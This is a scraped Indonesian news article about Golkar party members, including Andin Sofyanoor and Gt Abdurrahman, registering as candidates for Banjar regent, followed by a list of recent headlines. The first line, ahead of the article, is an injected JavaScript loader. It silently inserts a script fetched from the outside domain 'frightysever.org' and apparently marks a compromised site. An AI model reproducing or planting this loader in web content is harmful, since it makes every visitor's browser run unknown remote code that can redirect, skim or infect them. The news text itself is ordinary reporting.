(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Politik

Tiga Kader Beringin Andin-Antung Aman-Gt Iskandar Pelamar Kursi Banjar 1


MARTAPURA, Buka penjaringan pendaftaran bakal calon bupati dan calon wakil bupati Banjar, kantor DPD Partai Golkar diserbu pelamar.

Partai yang lahir dari era Soeharto ini sepertinya laris manis di Kabupaten Banjar, banyak bakal calon bupati yang ingin bernaung di bawah rindangnya beringin. Hal ini terbukti dengan diserbunya kantor DPC Golkar Banjar, setelah dibuka pendaftaran bakal calon bupati Banjar dan wakil bupati.

Menurut Kamaruzzaman, Ketua Tim Penjaringan Bakal Calon Bupati dan Wakil Bupati Banjar, walaupun banyak persyaratan umum dan persyaratan khusus yang diberlakukan partai Golkar, bakal calon sendiri tetap berusaha untuk melengkapi hal tersebut, terbukti di hari pertama sudah ada yang menyerahkan berkas pendaftaran.

“Meskipun sudah ada kader dari Partai Golkar sendiri, namun kita juga membuka pendaftaran bagi lainnya yang mau ikut bergabung, tentunya kita membuka kesempatan bagi siapa saja,” katanya.

Berdasarkan pantauan Kanalkalimantan pada Rabu (25/9), sejumlah bakal calon bupati Banjar berdatangan untuk mendaftar ke DPD Partai Golkar Banjar. Diantaranya kader partai Golkar sendiri yaitu Gt Abdurrahman, anggota DPRD Banjar, tak berselang beberapa menit kader Golkar lain mendaftarkan diri yaitu Dr Andin Sofyanoor, hingga Gt Syahyar, staf ahli Gubernur. Lalu ada nama Kasmili mantan anggota DPRD Banjar 2014-2019, hingga Gt Iskandar Sukma Alamsyah yang merupakan pengurus DPP Partai Golkar.

Gt Abdurrahman, kader beringin yang mencalonkan diri sebagai Bupati Banjar mengatakan, walaupun diprediksi akan banyak kader dari partai Golkar sendiri yang mencalonkan diri, Antung Aman -biasa disapa- mengakui, siap apabila partai menghendaki untuk menjadi bakal calon bupati Banjar.

“Kita tahu kader-kader Golkar sangat banyak sekali, makanya penutupan itu sampai tanggal 15 Oktober 2019, dan ini masih panjang prosesnya, hingga nantinya diseleksi kembali oleh partai, saya sendiri kalau diberikan kepercayaan dan diperintah oleh partai mau tidak mau, siap tidak siap itu harus siap,” pungkasnya.

Sementara itu, bakal calon bupati Banjar sesama kader beringin Dr Andin Sofyanoor, tidak menutup kemungkinan bagi kader Golkar sendiri mendaftarkan anggota yang memenuhi syarat dijadikan bakal calon bupati Banjar, tentu akan diberlakukan sama bagitu sesuai dengan intruksi pusat.

“Saya kebetulan yang mendaftar pertama dan melengkapi syarat-syarat administrasi tersebut, Insya Allah saya siap, lagi pula saya juga sebelumnya sudah minta izin dengan pimpinan,” katanya.

Golkar Banjar, sebut Andin, punya potensi kader yang besar untuk bisa menduduki jabatan eksekutif di Kabupaten Banjar. Mereka memiliki kompetensi yang mempuni dan hampir dipastikan konstelasi politik di dalam partai Golkar sendiri sangat tinggi.

“Biarkan proses pemilihan ini terbuka dan adil, partai Golkar sendiri juga bisa memilih kadernya yang terbaik sehingga akan ada yang terbaik lagi, sehingga dapat membawa Kabupaten Banjar untuk lebih maju lagi,” pungkasnya. (rendy)

Reporter : Rendy
Editor : Bie

 


Desy Arfianty

Recent Posts

Banjarbaru Posisi Kedua Klasemen Sementara Popda Kalsel 2024

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah cabang olahraga (cabor) unggulan membawa kontingen Kota Banjarbaru bertengger di posisi… Read More

1 jam ago

Hasnur Resmi Lamar Partai Golkar, Mencari ‘Pintu’ Koalisi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hasnuryadi Sulaiman untuk maju pada kontestasi Pemilihan Gubernur dan Wakil Gubernur… Read More

3 jam ago

Pasti Maju Pilwali Banjarbaru, Ovie Simpan Nama Pasangan

KANALKALIMANTAN.COM, BANJARBARU - Aditya Mufti Ariffin memastikan akan kembali berkontestasi dalam Pemilihan Kepala Daerah (Pilkada)… Read More

4 jam ago

Soal Caleg Terpilih Mundur atau Tidak Mundur Jika Maju Pilkada, Begini Penjelasan KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Anggota Komisi Pemilihan Umum (KPU) Provinsi Kalimantan Selatan (Kalsel), Fahmi Failasopa menegaskan… Read More

6 jam ago

Jalan Pangeran Suriansyah Banjarbaru Steril PKL dan Parkir Tepi Jalan

KANALKALIMANTAN.COM, BANJARBARU - Aktivitas Pedagang Kaki Lima alias PKL di sepanjang jalan Pangeran Suriansyah, Kelurahan… Read More

8 jam ago

Wapres Serahkan Motor Perpustakaan Keliling ke Pemkab HSU

KANALKALIMANTAN.COM, JAKARTA - Wakil Presiden RI, KH Ma’ruf Amin secara simbolis menyerahkan bantuan Motor Perpustakaan… Read More

9 jam ago

This website uses cookies.